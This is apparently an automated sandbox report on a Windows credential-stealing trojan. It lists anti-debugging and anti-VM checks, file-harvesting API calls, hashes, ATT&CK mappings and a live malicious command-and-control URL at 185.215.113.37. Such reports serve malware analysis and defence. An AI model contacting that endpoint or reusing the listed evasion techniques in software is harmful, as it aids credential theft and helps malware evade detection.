Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD53AE second address: FD53F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dh, 1Ah 0x0000000d push dword ptr [ebp+122D2FA7h] 0x00000013 mov edx, dword ptr [ebp+122D1910h] 0x00000019 call 00007FC221A94B29h 0x0000001e jmp 00007FC221A94B35h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FC221A94B28h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD53F0 second address: FD5417 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC220745E00h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC220745DFAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD5417 second address: FD545C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC221A94B2Ch 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jns 00007FC221A94B39h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD545C second address: FD5460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD6E55 second address: FD6E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD6E5F second address: FD6E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD69A0 second address: FD69A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD69A4 second address: FD69AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561032F second address: 561034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FC221A94B2Bh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561034B second address: 561035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 561035C second address: 5610362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EF780D second address: EF7811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D51A4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D4F5BE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EFC629 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F774E8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13401
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13398
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13420
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13413
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13453
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe | Binary or memory string: [Program Manager
Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: [Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B07B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques matched by this sample carry the number of matching signatures in parentheses; all other entries are the unmatched default matrix cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpqM | file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php%M | file.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37G | file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/l | file.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541095
Start date and time: 2024-10-24 12:10:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | g4Cyr2T5jq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | g4Cyr2T5jq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | msqT9atzYW.exe | malicious | Amadey | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                        No context
                        No context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948302954318922
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'820'160 bytes
MD5: 3232476789303ec2731e9ccce8937fea
SHA1: 9d2054302efc53083547e139d7f8a7487e909c89
SHA256: 8e46ac374c025d82eb6c7c0db64706ce2546735b1dc5758087fb6fbe9041af84
SHA512: 83e093988daf1649ec994a1f07557e9fabd9a8fed52647379102414ba8b5be5584135db559149516f06f40662272c55cf0014f04dcf8dca04b1857a8232d52e4
SSDEEP: 24576:7uHFgUEdKlxkd4YCi5TrXwP7slXyC1qf7r4cPIeYa3xolQBqXk/cBmIi8Q8:SHCUEY4HwP7SXr1qfX4KBCQBqK+i8N
TLSH: 7D8533EC813E17EDE89E8E7E1889D04E30FF71448F465EFEB899153DA11B60A6248F54
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa8a000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FC220B9E93Ah
                        shld dword ptr [ebx], ebx, 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007FC220BA0935h
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], cl
                        add byte ptr [eax], al
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, byte ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | a93ecb71b529076d3a6a95e427a13263 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x294000 | 0x200 | 32cc314bc2a1634160c80c87ae81ad14 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oxbstytm | 0x4f2000 | 0x197000 | 0x196400 | f34311c61cbec098d9a7f5b94f0c51f1 | False | 0.9948882211538461 | data | 7.954384653876487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yzvcyrux | 0x689000 | 0x1000 | 0x400 | da4a51ff8bcb97cde192d83a229bab4f | False | 0.7099609375 | data | 5.793995449541384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68a000 | 0x3000 | 0x2200 | 4fbc2db30dae5ee5286d1443da79c90c | False | 0.06353400735294118 | DOS executable (COM) | 0.80571294913891 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
